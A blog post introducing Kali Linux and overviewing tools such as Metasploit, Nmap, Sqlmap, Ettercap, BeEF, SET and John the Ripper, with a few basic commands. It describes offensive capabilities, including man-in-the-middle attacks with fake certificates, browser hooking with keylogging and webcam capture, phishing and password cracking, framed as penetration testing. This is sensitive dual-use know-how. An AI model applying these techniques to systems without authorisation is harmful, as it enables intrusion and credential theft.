Kali is the latest and greatest version of the ever-popular Backtrack Linux penetration testing distribution. The creators of the Backtrack series kept Kali in a format very similar to Backtrack, so anyone familiar with the older Backtrack platform will feel right at home.
Kali includes more than 500 security testing tools. A lot of the redundant tools from Backtrack have been removed and the tool interface streamlined. You can now get to the most used tools quickly as they appear in a top ten security tool menu. You can also find these same tools and a plethora of others all neatly categorized in the menu system.
Kali allows you to use similar tools and techniques that a hacker would use to test the security of your network so you can find and correct these issues before a real hacker finds them.
There are many other tools which can be used in any way you want. Ranging from Aircrack-ng to Metasploit Framework, they all are the best tools in the world of technology and all of them can be found in all versions of Kali Linux.
- Metasploit Framework
- BeEF Framework
- John The Ripper
Besides containing tools that can be used for the penetration testing task, Kali Linux also comes with several tools that you can use for the following:
- Wireless attacks: This category includes tools to attack Bluetooth, RFID/NFC, and wireless devices.
- Reverse engineering: This category contains tools that can be used to debug a program or disassemble an executable file.
- Stress testing: This category contains tools that can be used to help you in stress testing your network, wireless, Web, and VOIP environment.
- Hardware hacking: Tools in this category can be used if you want to work with Android and Arduino applications.
- Forensics: In this category, you will find several tools that can be used for digital forensics, such as acquiring a hard disk image, carving files, and analyzing the hard disk image. To use the forensics capabilities in Kali Linux properly, you need to navigate to Kali Linux Forensics | No Drives or Swap Mount in the booting menu. With this option, Kali Linux will not mount the drives automatically, so it will preserve the drives’ integrity.
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimisations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
2. Metasploit Framework
Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Metasploit is basically a project which provides information regarding security vulnerabilities and helps in penetration testing but again misused by hackers for exploiting these vulnerabilities.
This tool is one of the best tools for a security testing company which gives a complete framework or playground for testing and is loaded with over a thousand of exploits, hundreds of payloads and multiple encoders.
Metasploit can be a little confusing if you have never used it before, but once you get used to how it works, you can do some amazing things with it
Kali Linux has an abundant amount of tools readily available at a moment’s notice, but the real power of these tools only shines when the tools are used both properly and in the right order. When testing web applications, the testing
methodology is no different than the first three phases of the hacker methodology; recon, scanning, and exploitation.
For example, WPScan is used specifically against WordPress CMS applications.
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.
It is basically a network discoverer.It tells about the open hosts and used for managing network but can even tell you about the OS as well as the version of firewall used and so many things which hackers use to exploit a network. It is basically made for security auditing but used as a penetrating tool by hackers as it can tell you, about what source information belongs just by the IP of the targeted victim.
One of the first steps that many security testers use is to do an “Nmap” scan to try to determine what ports are open and hopefully, even what services are installed on those ports. If you can determine open ports and service program versions, then you can easily exploit a vulnerability in the service and compromise the whole machine.
Nmap also has a GUI version called Zenmap, which can be invoked by issuing the command zenmap at the terminal window or by going to Applications | Kali Linux | Information Gathering | Network Scanners | zenmap.
For example, if we want to fingerprint the operating system used on the 192.168.20.128 machine, we use the following command:
Command: nmap -O 192.168.20.128
Besides being used as a port scanner, Nmap has several other capabilities as follows:
- Host discovery: Nmap can be used to find live hosts on the target systems. By default, Nmap will send an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request to carry out the host discovery.
- Service/version detection: After Nmap has discovered the ports, it can further check for the service protocol, the application name, and the version number used on the target machine.
- Operating system detection: Nmap sends a series of packets to the remote host and examines the responses. Then, it compares these responses with its operating system fingerprint database and prints out the details if there is a match. If it is not able to determine the operating system, Nmap will provide a URL where you can submit the fingerprint to update its operating system fingerprint database. Of course, you should submit the fingerprint if you know the operating system used on the target system.
- Network traceroute: It is performed to determine the port and protocol that is most likely to reach the target system. Nmap traceroute starts with a high value of Time to Live (TTL) and decrements it until the TTL value reaches zero.
- Nmap Scripting Engine (NSE): With this feature, Nmap can be extended. If you want to add a check that is not included with the default Nmap, you can do so by writing the check using the Nmap scripting engine. Currently, there are checks for vulnerabilities in network services and for enumerating resources on the target system.
Wireshark is the world’s foremost network protocol analyzer. Wireshark is one of the most used tools in Kali Linux. It is formerly known as Ethereal.
Wireshark is a network package analyser. It is mainly used for learning the network packages as it is one of the best tools which gives packages in human-readable form. It is the foremost tool for deep inspection of hundreds of protocols. It can capture packets offline as well as online.
And the best part of Wireshark is that it supports decryption for many protocols including WEPs, WPA, WPA2 and many more.
Wireshark uses a GTK+ widget toolkit to implement its user interface and pcap to capture packets. It operates very similarly to a tcpdump command; however, acting as a graphical frontend with integrated sorting and filtering options.
Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
The basic syntax to use Sqlmap is: sqlmap -u URL –function
Sqlmap automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Sqlmap comes with a detection engine, as well as a broad range of Penetration Testing features that range from database fingerprinting to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Ettercap is a free and open-source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows.
Ettercap is a suite of tools to do a man-in-the-middle attack on LAN. It will perform attacks on the ARP protocol by positioning itself as the man in the middle. Once it achieves this, it is able to do the following:
- Modify data connections
- Password discovery for FTP, HTTP, POP, SSH1, and so on
- Provide fake SSL certificates to foil the victim’s HTTPS sessions
Ettercap comes with three modes of operation: text mode, curses mode, and graphical mode using GTK.
- To start Ettercap in text mode, use the console to execute the following command: # ettercap -T
- To start Ettercap in curses mode, use the console to execute the following command: # ettercap -C
- To start Ettercap in graphical mode, use the console to execute the following command: # ettercap -G
8. BeEF Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF can be very interesting to play with and fairly easy to use once you get the hang of it.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
BeEF’s modules also perform following tasks such as:
- Fingerprinting and the Reconnaissance of compromised browsers.
- Detecting software on the client (IE) and obtaining the list of directories in the Program Files.
- Taking photos using the compromised system’s webcam.
- Conducting searches of victim’s data files and stealing data that may contain secret data.
- Implementing browser keystroke logging.
9. SEToolkit (Social Engineering Toolkit)
Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems?
This is most commonly used in phishing attacks today, craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it?
The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time.
The Social Engineering Toolkit is truly a robust and feature-rich tool for any corporate security testing team.
Some of the most efficient and useful attack methods employed by SET include targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media (USB/DVD/CD), mass-mailer attacks, and other similar multi-attack web vectors.
This combination of attack methods provides you with a powerful platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.
10. John the Ripper
Cracking passwords is a task that is used by all penetration testers. Inherently, the most insecure part of any system is the passwords submitted by users. No matter the password policy, humans inevitably hate entering strong passwords or resetting them as often as they should. This makes them an easy target for hackers.
John the Ripper is one of the fastest password crackers. It is used for brute force attacks. It is also used for dictionary attack in which it takes a password from a wordlist and first converts it into the format in which password is going to be tested and then crack the password.
The best part is that it can also be run against encrypted passwords, hash types found in most UNIX and even the hash LM of windows.
Currently, it can crack more than 40 password hash types, such as DES, MD5, LM, NT, crypt, NETLM, and NETNTLM.
John supports the following four password cracking modes:
- Wordlist mode: In this mode, you only need to supply the wordlist file and the password file to be cracked. A wordlist file is a text file containing the possible passwords. There is only one word on each line. You can also use a rule to instruct John to modify the words contained in the wordlist according to the rule.
- Single crack mode: This mode has been suggested by the author of John and is to be tried first. In this mode, John will use the login names, Full Name field, and users’ home directory as the password candidates. These password candidates are then used to crack the password of the account it was taken from or to crack the password hash with the same salt. As a result, it is much
faster compared to the wordlist mode.
- Incremental mode: In this mode, john will try all the possible character combinations as the password. Although it is the most powerful cracking method, if you don’t set the termination condition, the process will take a very long time. The examples of termination conditions are setting a short password limit and using a small character set.
- External mode: With this mode, you can use the external cracking mode to be used by John. You need to create a configuration file section called [List. External:MODE], where MODE is the name you assign. This section should contain functions programmed in a subset of C programming language.
Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.
Posted by Shubham ;)